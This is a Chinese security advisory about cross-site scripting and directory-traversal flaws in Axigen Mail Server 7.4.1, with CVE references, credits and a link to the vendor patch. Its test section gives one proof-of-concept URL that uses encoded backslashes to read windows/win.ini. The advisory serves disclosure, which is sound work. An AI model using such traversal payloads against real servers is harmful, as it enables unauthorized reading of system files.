发布日期：2010-09-15
更新日期：2010-09-17

受影响系统：

Axigen Mail Server 7.4.1

不受影响系统：

Axigen Mail Server 7.4.2

描述：

---

BUGTRAQ  ID: 43230
CVE(CAN) ID: CVE-2010-3460,CVE-2010-3459

Axigen Mail Server是一款小型的邮件服务器。

Axigen邮件服务器的Ajax WebMail界面没有正确地过滤用户输入便返回给了用户，这可能导致跨站脚本攻击；此外用户还可以在HTTP请求中将“\”字符编码为“%5C”执行目录遍历攻击，读取任意系统文件。

<*来源：Bogdan Calin （bogdan@acunetix.com）
  
  链接：http://secunia.com/advisories/41430/
        http://marc.info/?l=full-disclosure&m=128454193732566&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://www.example.com/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini

建议：

---

厂商补丁：

Axigen
------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.axigen.com/press/product-releases/axigen-releases-version-742_74.html

浏览次数：2118
严重程度：0（网友投票）